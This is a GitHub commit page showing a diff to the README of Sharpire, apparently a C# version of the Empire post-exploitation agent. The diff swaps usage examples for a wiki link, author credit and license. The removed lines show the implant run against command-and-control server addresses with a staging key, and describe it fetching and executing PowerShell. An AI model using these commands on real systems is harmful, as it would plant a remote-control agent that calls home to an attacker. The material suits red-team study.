forked from 0xbadjuju/Sharpire
-
Notifications
You must be signed in to change notification settings - Fork 2
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Alexander
authored
Mar 14, 2019
1 parent
52718e9
commit 1292ed2
Showing
1 changed file
with
9 additions
and
6 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,12 +1,15 @@ | ||
## Sharpire - An implimentation of the Empire Agent in C# | ||
## Sharpire - An Implimentation of the Empire Agent in C# | ||
|
||
sharpire.exe \<server\> \<stagingkey\> \<language\> | ||
For usage details please see the wiki:<br> | ||
https://github.com/0xbadjuju/Sharpire/wiki | ||
|
||
*Note: This is still in testing. | ||
|
||
|
||
sharpire.exe "http://192.168.255.100:80" "aRAVQ_z?6PqujiWgf!eNwBZ&G)^h(L/|" "powershell"<br/> | ||
sharpire.exe "http://10.2.2.100:80" "aRAVQ_z?6PqujiWgf!eNwBZ&G)^h(L/|" "dotnet" | ||
### Author, Contributors, and License | ||
|
||
*Note: This is still in testing. | ||
Author: Alexander Polce Leary (@0xbadjuju) - 2019 | ||
|
||
License: BSD 3-Clause | ||
|
||
This application has two modes of operation, the first use the executable to stage down the PowerShell and executes it in a runspace. The second has the agent exist entirely in a C# application with PowerShell only being executed in modules. | ||
Required Dependencies: None |